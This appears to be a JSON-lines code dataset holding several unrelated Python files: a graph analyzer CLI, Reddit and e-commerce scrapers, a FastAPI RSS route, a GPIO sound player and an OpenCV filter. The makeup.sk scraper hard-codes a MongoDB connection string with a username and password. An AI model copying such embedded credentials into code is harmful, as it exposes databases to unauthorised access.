Creates a list with all common shared vertices between two sub-graphs including the root-vertex. Thereby all\n children of each sub-graph where collected and matched against each other. If there is no match, a empty list is\n returned.\n\n :param graph: the input graph\n :param vtx_a: the first root-vertex of an sub-graph\n :param vtx_b: the second root-vertex of an sub-graph\n :return: a list with all common shared vertex indices or a empty list\n \"\"\"\n sub_set_a = collect_subgraph_vertices(graph, vtx_a)\n sub_set_b = collect_subgraph_vertices(graph, vtx_b)\n shared_vertex_list = []\n\n for vtx in sub_set_a:\n if vtx in sub_set_b:\n shared_vertex_list.append(vtx)\n\n return shared_vertex_list\n\n\ndef exclude_nodes(graph: Graph, excluding_vertex_list: list) -> GraphView:\n \"\"\"\n Removes the given nodes (vertices) from the source graph and stores the result in a new `GraphView`-object. If\n a removed node has children, all the children and their sub-children getting removed as well.\n\n :param graph: the input graph\n :param excluding_vertex_list: a list with all vertices which should be excluded\n :return: a new `GraphView` without the vertices of the given list\n \"\"\"\n filter_prop = graph.new_vertex_property(\"bool\")\n for vtx in graph.vertices():\n if vtx not in excluding_vertex_list:\n filter_prop.a[int(vtx)] = True\n\n return GraphView(graph, vfilt=filter_prop)\n\n\ndef exclude_subgraph(graph: Graph, sub_vtx) -> GraphView:\n \"\"\"\n Removes the given sub-graph from the source graph and stores the result in a new `GraphView` object. This function\n can be used recursive on it's self.\n\n :param graph: the input graph\n :param sub_vtx: the root node of the sub-graph\n :return: a new `GraphView` without the children of the given sub-graph (the sub-graph root-node is kept)\n \"\"\"\n sub_set = collect_subgraph_vertices(graph, sub_vtx)\n filter_prop = graph.new_vertex_property(\"bool\")\n filter_prop.a[int(sub_vtx)] = True # keep the root-vertex of the sub-graph\n for vtx in graph.vertices():\n if vtx not in sub_set:\n filter_prop.a[int(vtx)] = True\n\n out_graph = GraphView(graph, vfilt=filter_prop)\n return out_graph\n\n\ndef export_graph(graph: Graph, out_file=\"\"):\n \"\"\"\n Exports the given `Graph` or `GraphView`-object into a *.gt-file.\n\n :param graph: the `Graph` or `GraphView`-object to export\n :param out_file: the file name or a timestamp on default\n \"\"\"\n if not out_file:\n out_file = strftime(\"%Y-%m-%d_%H:%M:%S\", gmtime()) # use timestamp as default file name\n\n if not os.path.isdir(DEFAULT_OUTPUT_DIR):\n os.mkdir(DEFAULT_OUTPUT_DIR)\n\n graph.save(DEFAULT_OUTPUT_DIR + out_file + \".gt\")\n\n\ndef nodes_connected(graph: Graph, nodes: list):\n \"\"\"\n Check weather the given list of nodes are connected in the graph.\n For this, the shortest paths between all node combinations is collected.\n Afterwards, it is checked if those paths are all connected.\n Returns true/false.\n\n :param graph: the input graph\n :param nodes: list of node IDs or node names\n :return: true if all nodes connected, false otherwise\n \"\"\"\n # Convert all node names in the list to vertices:\n node_names = [n for n in nodes if not n.isdigit()]\n node_vertices = [graph.vertex(int(n)) for n in nodes if isinstance(n, int) or n.isdigit()]\n for vtx in graph.vertices():\n if graph.vp.vertex_name[vtx] in node_names:\n node_names.remove(graph.vp.vertex_name[vtx])\n node_vertices.append(vtx)\n if not node_names:\n print(\"Warning: The following node names could not be found in the graph and will be ignored:\", node_names)\n\n # Filter graph by input nodes and the shortest paths between them:\n vprop_filter = graph.new_vertex_property(\"bool\")\n eprop_filter = graph.new_edge_property(\"bool\")\n for v in node_vertices:\n vprop_filter[v] = True\n for (a, b) in itertools.product(node_vertices, node_vertices):\n v_list, e_list = shortest_path(graph, a, b)\n for v in v_list:\n vprop_filter[v] = True\n for e in e_list:\n eprop_filter[e] = True\n graph_filtered = GraphView(graph, vfilt=vprop_filter, efilt=eprop_filter)\n\n # Check if the graph only consists of one graph\n return bool(len(list(UnconnectedGraphs(graph_filtered))) == 1)\n\n\ndef group(graph: Graph, group_val: str, vtx_group: list) -> GraphView:\n \"\"\"\n Merges the given group of nodes together into one head-node. The nodes in the group-list getting removed\n afterwards, so only the new head-node and the edges from/to the nodes outside of the group remain in the graph.\n\n :param graph: the input graph\n :param group_val: the value/name of the new head-vertex\n :param vtx_group: the list of vertices which get merged into the head-vertex\n :return: a new `GraphView` with the given vertices grouped together\n \"\"\"\n group_head = graph.add_vertex() # create new head-vertex for the group\n graph.vp.vertex_name[group_head] = group_val # assign a value/name to the new head-vertex\n\n # collect all outgoing connections from the group\n out_set = set()\n for vtx in vtx_group:\n for out_vtx in graph.get_out_neighbours(vtx):\n if out_vtx not in vtx_group:\n out_set.add(out_vtx)\n\n # collect all incoming connections from the group\n in_set = set()\n for vtx in vtx_group:\n for in_vtx in graph.get_in_neighbours(vtx):\n if in_vtx not in vtx_group:\n in_set.add(in_vtx)\n\n # let the group-head take over outgoing connections\n for o in out_set:\n graph.add_edge(group_head, o)\n\n # let the group-head take over the incoming connections\n for i in in_set:\n graph.add_edge(i, group_head)\n\n # filter out grouped vertices\n filter_prop = graph.new_vertex_property(\"bool\")\n for vtx in graph.vertices():\n if vtx not in vtx_group:\n filter_prop.a[int(vtx)] = True\n\n return GraphView(graph, vfilt=filter_prop)\n\n\ndef parse_node_values(graph: Graph, vertex_values: list) -> list:\n \"\"\"\n Matches the given value list with the nodes in the input graph and returns the found indices as list.\n This routine is supposed to be a comfort utility function to take nearly every input and translates it into a\n processable output list, whether the input is a list of strings and/or already synthesized indices. If numbers are\n given in the input list, they get interpreted as vertex indices and therefore get bypassed directly into the\n resulting list. If necessary, Numbers could be escaped as string with a leading dot (e.g. `.5`).\n\n :param graph: the input graph\n :param vertex_values: list with indices node values to match\n :return: a list with the found node indices or a empty list if no vertex index form the input list was given and no\n string match was found\n \"\"\"\n node_indices = []\n for val in vertex_values:\n if val.isdigit():\n node_indices.append(val)\n else:\n if val[0] == '.':\n val = val[1:]\n\n was_found = False\n for vtx in graph.vertices():\n vtx_value = graph.vp.vertex_name[vtx]\n if vtx_value == val:\n node_indices.append(vtx)\n was_found = True\n break\n\n if not was_found:\n print(\"Could not find Node '%s'. Omit value.\" % val)\n\n return node_indices\n\n\ndef add_parent(graph: Graph, parent_val: str, vtx_group: list) -> GraphView:\n \"\"\"\n Adds a new node to the graph and assigns it to the given vertices as another parent node.\n\n :param graph: the input graph\n :param parent_val: the value/name of the new parent node\n :param vtx_group: the vertices which become assigned to the new parent\n :return: a new `GraphView` with the new parent node assigned to the given vertices\n \"\"\"\n parent_node = graph.add_vertex() # create new parent-vertex for the group\n graph.vp.vertex_name[parent_node] = parent_val # assign a value/name to the new parent-vertex\n\n # assign the node as a parent to the group\n for vtx in vtx_group:\n graph.add_edge(parent_node, vtx)\n\n return GraphView(graph)\n\n\ndef main(argv):\n \"\"\"\n Main function which parses the passed arguments.\n\n :param argv: the argument list passed by the command line\n \"\"\"\n parser = argparse.ArgumentParser(description=\"A program to analyse and explore large *.dot files.\")\n parser.add_argument('file', type=str, metavar='FILE')\n parser.add_argument('-c', '--children', nargs=1, metavar='NODE_ID|NODE_NAME',\n help=\"Print the Node and its (sub-)children.\")\n parser.add_argument('-p', '--print', nargs='+', metavar='NODE_IDs|NODE_NAMEs',\n help=\"Print some details about the given node(s).\")\n parser.add_argument('-s', '--search', type=str, nargs='+', metavar='SEARCH_STR', help=\"Search for the given node.\")\n parser.add_argument('-t', '--top', action='store_true',\n help=\"Find the top nodes with the most connections (hotspots).\")\n parser.add_argument('--cycles', action='store_true', help=\"Find and print cycles in graph.\")\n parser.add_argument('--nodes-connected', type=str, nargs='+', metavar='NODE_ID',\n help=\"Check if a list of nodes (id, name) have a connection in the graph. Connections may be \"\n \"indirect, e.g. with other nodes in between. Outputs yes/no.\")\n parser.add_argument('-ss', '--subgraphs', action='store_true',\n help=\"Searches and outputs all sub-graphs from the main graph.\")\n parser.add_argument('-sis', '--independent-subgraphs', action='store_true',\n help=\"Searches and lists all independent sub-graphs (sub-graphs without any other sub-graphs \"\n \"in it).\")\n parser.add_argument('--shared', nargs=2, metavar='NODE_ID|NODE_NAME',\n help=\"Lists all common shared vertices of two sub-graphs.\")\n parser.add_argument('-en', '--exclude-nodes', nargs='+', metavar='NODE_IDs|NODE_NAMEs',\n help=\"Excludes the given nodes (and their children) and exports the remaining graph as\"\n \"*.gt-file.\")\n parser.add_argument('-es', '--exclude-subgraphs', nargs='+', metavar='SUB_ROOT_NODE_IDs|SUB_ROOT_NODE_NAMEs',\n help=\"Excludes the given sub-graphs (without root node) and exports the remaining graph as \"\n \"*.gt-file.\")\n parser.add_argument('-r', '--raw', action='store_true',\n help=\"Enable raw output format for further automated processing or piping. This option is \"\n \"supported by '--search', '--children', '--subgraphs', '--independent-subgraphs', \"\n \"'--shared'.\")\n parser.add_argument('--group', nargs='+', metavar=('GROUP_NODE_NAME', 'NODE_IDs|NODE_NAMEs'),\n help=\"Merges the given list of node IDs together into one group-node.\")\n parser.add_argument('--outfile', type=str, nargs=1, metavar='FILE-NAME',\n help=\"Option to set a specific file name for a exported file. This option works in combination \"\n \"with '--exclude-nodes', '--exclude-subgraphs', '--group', '--export-subgraph'.\")\n parser.add_argument('--add-parent', nargs='+', metavar=('PARENT_NODE_NAME', 'NODE_IDs|NODE_NAMEs'),\n help=\"Adds a new parent node to the given nodes.\")\n parser.add_argument('--export-subgraph', nargs=1, metavar='NODE_ID|NODE_NAME',\n help=\"Exports the given sub-graph into a *.svg-file.\")\n parser.add_argument('--export-circle-diagram', action='store_true',\n help=\"Exports the dependencies of the graph as a circle diagram.\")\n\n args = parser.parse_args()\n\n if not args.file:\n print(HELP_INFO_MSG)\n sys.exit(1)\n else:\n graph = load_graph(args.file)\n\n if args.children:\n node = parse_node_values(graph, args.children)\n if len(node) != 1:\n print(\"Error: Could not find required node.\")\n sys.exit(1)\n if args.raw:\n for vtx in collect_subgraph_vertices(graph, node[0]):\n print(\"%s \" % vtx, end=\"\")\n else:\n print_vertex_children(graph, node[0], 3)\n\n if args.print:\n nodes = parse_node_values(graph, args.print)\n for vtx in nodes:\n print_graph_vertex(graph, vtx)\n\n if args.search:\n for search_str in args.search:\n vertex_set = search_vertices(graph, search_str)\n\n if args.raw:\n for vtx in vertex_set:\n print(\"%s \" % vtx, end=\"\")\n else:\n list_len = len(vertex_set)\n if list_len:\n print(\"Found %d results for '%s':\" % (list_len, search_str))\n for vtx in vertex_set:\n vtx_value = graph.vp.vertex_name[vtx]\n print(\"vertex[%s]\" % int(vtx), vtx_value)\n else:\n print(\"No results found for '%s'.\" % search_str)\n\n if args.top:\n i = 1\n vertex_list = find_hotspots_out(graph)\n print(\"Top out-degree nodes:\")\n for vtx in vertex_list:\n print(\"%d.\" % i,\n \"vtx[%d]\" % vtx,\n \"in:\", vtx.in_degree(),\n \"out:\", vtx.out_degree(),\n \"val:\", graph.vp.vertex_name[vtx])\n i += 1\n\n i = 1\n vertex_list = find_hotspots_in(graph)\n print(\"Top in-degree nodes:\")\n for vtx in vertex_list:\n print(\"%d.\" % i,\n \"vtx[%d]\" % vtx,\n \"in:\", vtx.in_degree(),\n \"out:\", vtx.out_degree(),\n \"val:\", graph.vp.vertex_name[vtx])\n i += 1\n\n if args.cycles:\n print_cycles(graph)\n\n if args.subgraphs:\n detect_subgraphs(graph, not args.raw, SelectionMode.ALL)\n\n if args.shared:\n nodes = parse_node_values(graph, args.shared)\n if len(nodes) != 2:\n print(\"Error: Could not find required node for comparison.\")\n sys.exit(1)\n\n shared_vtx_list = list_shared_sub_vertices(graph, nodes[0], nodes[1])\n if args.raw:\n for vtx in shared_vtx_list:\n print(\"%s \" % vtx, end=\"\")\n else:\n print(\"Shared vertices:\")\n print(shared_vtx_list)\n\n if args.independent_subgraphs:\n detect_subgraphs(graph, not args.raw, SelectionMode.INDEPENDENT)\n\n if args.exclude_subgraphs:\n nodes = parse_node_values(graph, args.exclude_subgraphs)\n sub = graph\n for sub_vtx in nodes:\n sub = exclude_subgraph(sub, sub_vtx)\n\n print(\"Excluded %d sub-graphs\" % len(nodes))\n if args.outfile:\n export_graph(sub, args.outfile[0])\n else:\n export_graph(sub)\n\n if args.exclude_nodes:\n nodes = parse_node_values(graph, args.exclude_nodes)\n out_graph = exclude_nodes(graph, nodes)\n print(\"Excluded %d nodes\" % len(nodes))\n if args.outfile:\n export_graph(out_graph, args.outfile[0])\n else:\n export_graph(out_graph)\n\n if args.nodes_connected:\n if nodes_connected(graph, args.nodes_connected):\n print(\"yes\")\n else:\n print(\"no\")\n\n if args.group:\n if len(args.group) <= 1:\n print(\"Too few arguments for '--group'. Expected (str, int|str, ...).\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n\n if args.group[0].isdigit():\n print(\"Group name as to be a string. \"\n \"If you really want a number as group name, put a dot in front of it (e.g. '.5') to escape it.\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n else:\n if args.group[0][0] == '.': # escape number as string\n group_name = args.group[0][1:]\n else:\n group_name = args.group[0]\n\n vtx_list = parse_node_values(graph, args.group[1:])\n\n if args.outfile:\n export_graph(group(graph, group_name, vtx_list), args.outfile[0])\n else:\n export_graph(group(graph, group_name, vtx_list))\n\n if args.add_parent:\n if len(args.add_parent) <= 1:\n print(\"Too few arguments for '--add-parent'. Expected (str, int|str, ...).\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n\n if args.add_parent[0].isdigit():\n print(\"Parent name has to be a string. \"\n \"If you really want a number as parent name, put a dot in front of it (e.g. '.5') to escape it.\")\n print(HELP_INFO_MSG)\n sys.exit(1)\n else:\n if args.add_parent[0][0] == '.': # escape number as string\n parent_name = args.add_parent[0][1:]\n else:\n parent_name = args.add_parent[0]\n\n vtx_list = parse_node_values(graph, args.add_parent[1:])\n\n if args.outfile:\n export_graph(add_parent(graph, parent_name, vtx_list), args.outfile[0])\n else:\n export_graph(out_graph)\n\n if args.export_subgraph:\n node = parse_node_values(graph, args.export_subgraph)\n\n if args.outfile:\n export_subgraph(graph, node[0], args.outfile[0])\n else:\n export_subgraph(graph, node[0], \"sub\" + str(node))\n\n if args.export_circle_diagram:\n if args.outfile:\n export_circle_diagram(graph, args.outfile[0])\n else:\n export_circle_diagram(graph, \"circle_diagram\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"Waldleufer/archproj-bmwteam","sub_path":"src/graph_analyzer.py","file_name":"graph_analyzer.py","file_ext":"py","file_size_in_byte":30775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8322629521","text":"import praw\nfrom requests import Session\nimport pathlib\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\n\nclass GetRedditInfo:\n \"\"\"\n Get Reddit info from specified subreddits\n - subreddits: list of subreddits to check\n - credentials: dict of needed credentials:\n - client_id\n - client_secret\n - password\n - exclude (default None): list of URLs to exclude, ie. no articles from Breitbart\n - use_ratio (default False): upvotes / (active users).\n Designed to account for subreddit size.\n Results will be ranked by ratio, high to low\n - timeframe (default 1): amount of days back to go\n - amount (default 10): number of articles to return\n \"\"\"\n\n def __init__(self, subreddits, credentials, exclude=None, use_ratio=False, timeframe=1, amount=10):\n self.subreddits = subreddits\n self.credentials = credentials\n self.exclude = []\n for item in exclude:\n # adding dot so it only excludes URL domain\n self.exclude.append(item + '.')\n self.use_ratio = use_ratio\n self.timeframe = timeframe\n self.amount = amount\n\n self.__top_articles = {}\n\n # initialise session\n self.session = Session()\n self.session.verify = pathlib.Path(credentials['pem_file_loc'])\n self.reddit = praw.Reddit(client_id=credentials['client_id'],\n client_secret=credentials['client_secret'],\n password=credentials['password'],\n user_agent=credentials['user_agent'],\n username=credentials['username'])\n\n def __order_results(self, data, headers, column_to_order, dt_column):\n \"\"\"Reorder results\"\"\"\n df = pd.DataFrame(data)\n df.columns = headers\n\n # filter out posts more than timeframe days back\n timeback = (datetime.now() - timedelta(days=self.timeframe)).strftime(\"%Y-%m-%d %H:%M:%S\")\n df = df[(df[dt_column] >= f'{timeback}')]\n\n # sort output\n df.sort_values(by=[column_to_order])\n\n # return the amount requested\n return df.head(self.amount)\n\n def get_subscribers(self, subreddit):\n \"\"\"Get amount of subscribers in a subreddit\"\"\"\n try:\n subs = self.reddit.get(f'/r/{subreddit}/about.json').subscribers\n if subs is None or subs == 0:\n raise ValueError(f\"Cannot get subscribers from {subreddit}\")\n except Exception as e:\n raise ValueError(f\"Cannot get subscribers from {subreddit}\\n{e}\")\n else:\n return subs\n\n def get_top_articles(self, pd_dataframe=True):\n \"\"\"\n Get the top articles from list of subreddits\n Returns ordered pandas dataframe (default) by score descending or else list of lists\n for ratio_score true:\n Returns pandas dataframe or list of lists containing:\n - title\n - subreddit\n - score\n - ratio\n - id\n - url\n - comms_num\n - created\n - body\n for ratio_score false:\n Returns pandas dataframe containing:\n - title\n - subreddit\n - score\n - id\n - url\n - comms_num\n - created\n - body\n \"\"\"\n if self.use_ratio:\n results = []\n column_headers = [\"title\", \"subreddit\", \"score\", \"ratio\", \"id\", \"url\", \"comms_num\", \"created\", \"body\"]\n for subreddit in self.subreddits:\n sub = self.reddit.subreddit(subreddit)\n subscriber_amount = self.reddit.get(f'/r/{subreddit}/about.json').subscribers\n\n # add 25 in the event of links being excluded\n top_posts = sub.hot(limit=self.amount + 25)\n\n for post in top_posts:\n # skip if url in excluded list\n if any(x in post.url for x in self.exclude):\n continue\n\n # apply ratio_score\n ratio = post.score / subscriber_amount\n results.append([post.title,\n post.subreddit,\n post.score,\n ratio,\n post.id,\n post.url,\n post.num_comments,\n datetime.fromtimestamp(post.created),\n post.selftext])\n final = self.__order_results(results, column_headers, 'ratio', 'created')\n else:\n results = []\n column_headers = [\"title\", \"subreddit\", \"score\", \"id\", \"url\", \"comms_num\", \"created\", \"body\"]\n for subreddit in self.subreddits:\n sub = self.reddit.subreddit(subreddit)\n\n # add 25 in the event of links being excluded\n top_posts = sub.hot(limit=self.amount + 25)\n\n for post in top_posts:\n # skip if url in excluded list\n if post.url in self.exclude:\n continue\n\n results.append([post.title,\n post.subreddit,\n post.score,\n post.id,\n post.url,\n post.num_comments,\n datetime.fromtimestamp(post.created),\n post.selftext])\n final = self.__order_results(results, column_headers, 'score', 'created')\n if pd_dataframe:\n # return dataframe\n return final\n else:\n # return list of lists\n return final.values.tolist()\n","repo_name":"niallgorithm/email-trending","sub_path":"email-trending/redditinfo.py","file_name":"redditinfo.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72960033080","text":"from typing import List, Optional\n\nfrom fastapi import Depends, FastAPI, HTTPException, Query\nfrom sqlalchemy.orm import Session\n\nfrom route_class import TimedRoute, APIRouter\nfrom . import crud, models, schemas\nfrom .database import SessionLocal, engine\n\nmodels.Base.metadata.create_all(bind=engine)\n\nrouter = APIRouter(route_class=TimedRoute)\n\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n@router.post(\"/rss/\", response_model=schemas.Rss)\ndef create_rss(srtdesc: str = Query(..., min_length=3), rss: schemas.RssBase=None, db: Session = Depends(get_db)):\n db_rss = crud.get_rss_by_id(db, srtdesc=srtdesc)\n if db_rss:\n raise HTTPException(status_code=400, detail=\"This rss already registered\")\n rss = rss.dict()\n rsscreate = schemas.RssCreate(**{**rss, \"srtdesc\": srtdesc})\n return crud.create_rss(db=db, rss=rsscreate)\n\n\n@router.get(\"/rss/\", response_model=List[schemas.Rss])\ndef read_rss(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n rss = crud.get_rsses(db, skip=skip, limit=limit)\n return rss\n\n@router.get(\"/rss/{rss_id}\", response_model=schemas.Rss)\ndef read_rss(rss_id: int, db: Session = Depends(get_db)):\n db_rss = crud.get_rss(db, rss_id=rss_id)\n if db_rss is None:\n raise HTTPException(status_code=404, detail=\"Rss not found\")\n return db_rss","repo_name":"IanVzs/WindWhisper","sub_path":"rss_app/rss_app.py","file_name":"rss_app.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28409120447","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom urllib.parse import urljoin\nimport pymysql\nfrom scrapyProject.items import Item,CodeModel\n\nclass ScrapynameSpider(scrapy.Spider):\n name = 'codeLiang'\n def start_requests(self):\n if CodeModel.table_exists() == False:\n CodeModel.create_table()\n yield scrapy.Request(url='http://data.10jqka.com.cn/rank/ljqd/', callback=self.parse_list)\n\n def parse_list(self, response):\n yield CodeModel.delete().where(CodeModel.type == 2).execute()\n prev_item = response.meta.get('item')\n for elem in response.css('table tbody tr'):\n item = Item()\n #item = {}\n # print(111111111111111111111)\n # print(elem.css('.tc:nth-child(2) > a::text').extract_first())\n # print(111111111111111111111)\n item['code'] = elem.css('.tc:nth-child(2) > a::text').extract_first()\n item['codeName'] = elem.css('.tc:nth-child(3) > a::text').extract_first()\n item['continuityDay'] = elem.css('.tc:nth-child(5)::text').extract_first()\n item['industry'] = elem.css('.tc:nth-child(8) > a::text').extract_first()\n item['type'] = 2\n try:\n CodeModel.create(code=item['code'],codeName=item['codeName'],continuityDay=item['continuityDay'],industry=item['industry'],type=item['type'])\n except Exception as e:\n if str(e.args[0]) == '1062':\n print ('重复数据,跳过。')\n else:\n print (e.args[0],e.args[1])\n #item['url'] = elem.css('.tc:nth-child(2) > a::attr(\"href\")').extract_first()\n if prev_item is not None:\n for key, value in prev_item.items():\n item[key] = value\n yield item\n","repo_name":"1014470807/scrapy","sub_path":"spiders/codeLiang.py","file_name":"codeLiang.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"373327282","text":"def calc(string, letter):\r\n totalchar = len(string)\r\n matching_characters = string.count(letter)\r\n percentage = (matching_characters / totalchar) * 100\r\n ppercent= int(percentage)\r\n return ppercent\r\n\r\n# Test the function\r\nstring = input(\"Enter a string: \")\r\nletter = input(\"Enter a character: \")\r\npercentage = calc(string, letter)\r\nprint(f\"The percentage of '{letter}' in '{string}' is: {percentage}%\")\r\n","repo_name":"spongebobx18/code","sub_path":"percentstr.py","file_name":"percentstr.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26471502752","text":"import os\nimport logging as log\n\nfrom sqlite3wrapper import Sqlite3Wrapper\n\n\ndef main():\n log.basicConfig(level=log.DEBUG, format=\"[%(levelname)s] %(asctime)s - %(message)s\")\n\n db_path = \"test.db\"\n\n if os.path.isfile(db_path):\n os.remove(db_path)\n\n with Sqlite3Wrapper(db_path) as con:\n cur = con.cursor()\n cur.execute(\"CREATE TABLE person (id INTEGER PRIMARY KEY AUTOINCREMENT, firstname TEXT)\")\n cur.execute(\"INSERT INTO person (firstname) VALUES ('Peter')\")\n cur.execute(\"SELECT * FROM person\")\n print(cur.fetchall())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aronand/random_python_stuff","sub_path":"sqlite3wrapper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26451257900","text":"#Python GPIO library of choice is gpiozero\nfrom gpiozero import Button\n#sleep function helps eliminate contact bounce issues\nfrom time import sleep\n#module to play audio files\nfrom pygame import mixer\nmixer.init()\n#load sound files\n#note: files need to be 16 bit\nsound1 = mixer.Sound('stars.wav')\nsound2 = mixer.Sound('windbells.wav')\nsound3 = mixer.Sound('childrenofthestars.wav')\n#momentary button\nbutton = Button(4)\n#spst switch\nswitch = Button(23, bounce_time = 0.1)\nswitchFlag = 0 #remember if it's on or off\n\n#joystick buttons\njoy1 = Button(22)\njoy2 = Button(27)\njoy3 = Button(17)\nyFlag = 0 #remember if y has been touched\nxFlag = 0 #remember if x has been touched\n\nwhile True:\n\t#state 1 just button pressed\n\tif button.is_pressed and switchFlag == 0:\n\t\tsound1.play()\n\t\tprint(\"button is pressed\")\n\t\t#print(switchFlag)\n\t\tsleep(0.1)\n\t\tbutton.wait_for_release()\n\t#state 2 button and switch on only\n\telif button.is_pressed and switchFlag == 1 and yFlag == 0 and xFlag == 0:\n\t\tsound2.play()\n\t\tprint(\"special button is pressed\")\n\t\t#print(switchFlag)\n\t\tsleep(0.1)\n\t\tbutton.wait_for_release()\n\t#state 3 button and switch on and both directions on joystick toggled\n\telif button.is_pressed and switchFlag == 1 and yFlag == 1 and xFlag == 1:\n\t\tsound3.play()\n\t\tprint(\"extra special button is pressed\")\n\t\t#print(yFlag)\n\t\t#print(xFlag)\n\t\tsleep(0.1)\n\t\tbutton.wait_for_release()\n\t#if joystick is pressed down, previous joystick settings are reset\n\telif joy1.is_pressed:\n\t\tprint(\"reset\")\n\t\tyFlag = 0\n\t\txFlag = 0\n\t\tsleep(0.1)\n\t#check for y toggle\n\telif joy2.is_pressed:\n\t\tprint(\"y is pressed\")\n\t\tyFlag = 1\n\t\tsleep(0.1)\n\t#check for x toggle\n\telif joy3.is_pressed:\n\t\tprint(\"x is pressed\")\n\t\txFlag = 1\n\t\tsleep(0.1)\n\t#check to see if switch is on\n\telif switch.is_pressed:\n\t\tswitchFlag = 1\n\t#check to see if switch is off\n\telif switch.is_pressed == False:\n\t\tswitchFlag = 0\n","repo_name":"hongyingaliu/CPSC-334-Creative-Embedded-Systems","sub_path":"interactive devices/task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41637171390","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nfrom bson.objectid import ObjectId\nimport requests\nimport re\nimport pymongo\n\n\nconn_string='mongodb+srv://mongo:1234@cluster0.9xrn6.mongodb.net/test'\nclient=pymongo.MongoClient(conn_string)\n\nmydb=client['Products']\ndb=mydb.products\n\n\nproductsList=[]\n\nfor offset in range(0, 350*36, 36):\n url = f\"https://makeup.sk/ajax/filter/?offset={offset}\"\n r = requests.post(url=url, data={'categoryID': 2419})\n response = r.json()\n soup = BeautifulSoup(response['products'], 'html.parser')\n products = soup.find_all('li', class_= 'simple-slider-list__item')\n for p in products:\n try:\n if not soup.find('li', class_= 'out-of-stock'):\n brand = p.get(\"data-brand\")\n \n name = p.find('a', attrs={'class':'simple-slider-list__name'}).text\n \n price = p.get(\"data-price\")\n price = float(price)\n \n categorytmp = p.get('data-parent-category')\n categorytmp = re.sub('Make-up/', '', categorytmp)\n if not categorytmp is None or categorytmp!=\"\":\n category=categorytmp\n else:\n category=\"nešpecifikovaná\"\n \n url = f\"https://makeup.sk/{p.find('a')['href']}\"\n \n imageUrl = p.find('img').attrs['data-src-x2']\n \n obj={\n 'Brand': brand.capitalize(),\n 'Name':name.encode('ascii', 'ignore').decode('utf-8'),\n 'Price':price,\n 'Category':category.capitalize(),\n 'Url':url,\n 'Image':imageUrl,\n \"Eshop\": \"makeup\"\n }\n productsList.append(obj)\n else:\n break\n except Exception as e:\n print(e)\n continue\n\n# prvé vloženie dát do databázy\n # db.insert_many(productsList)\n\n# aktualizácia dát v databáze\nproducts=db.find({})\n\nfor p in products:\n db.update_one({\"_id\": ObjectId(p[\"_id\"])}, \n { \"$set\":\n {\"Name\": p[\"Name\"],\n \"Brand\": p[\"Brand\"], \n \"Price\": p[\"Price\"], \n \"Category\": p[\"Category\"], \n \"Url\": p[\"Url\"], \n \"Image\": p[\"Image\"],\n \"Eshop\": \"makeup\"}},\n upsert=True)\n\n ","repo_name":"xlysova/MyWork","sub_path":"BachelorThesis/webscraper/makeup.py","file_name":"makeup.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31342573584","text":"import cv2\nimport numpy as np\n\nfrom video_loop import run_video_capture_pipeline, args\n\ncap = cv2.VideoCapture(args.read_camera)\nret, frame1 = cap.read()\nprvs = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\nhsv = np.zeros_like(frame1)\nhsv[..., 1] = 255\ncap.release()\n\n\ndef dense_flow(image):\n global prvs\n next = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n flow = cv2.calcOpticalFlowFarneback(prvs, next, None, 0.5, 3, 15, 3, 5, 1.2, 0)\n\n mag, ang = cv2.cartToPolar(flow[..., 0], flow[..., 1])\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 2] = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX)\n image = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\n\n prvs = next\n return image\n\n\nrun_video_capture_pipeline(transform_fn=dense_flow)\n","repo_name":"charlielito/snapchat-filters-opencv","sub_path":"scripts/dense_optflow.py","file_name":"dense_optflow.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"40"} +{"seq_id":"42605525510","text":"#################################################################### All LIBRARY IMPORTED ############################################################\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nfrom threading import *\n\n# Initialize Window\n\nroot = Tk()\nroot.title(\"Price Alert\")\nroot.geometry(\"600x600\")\n\nHEADER = {\n \"User-Agent\": \"xyz\"\n}\n################################################################ FLIPKART #############################################################################\n\n\ndef flipkart_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n # common for both (name and price)\n frame_1 = soup.find('div', class_='_1HmYoV hCUpcT')\n frame_2 = frame_1.find('div', class_='_1HmYoV _35HD7C col-8-12')\n frame_3 = frame_2.find('div', class_='bhgxx2 col-12-12')\n frame_4 = frame_3.find('h1', class_='_9E25nV')\n frame_5 = 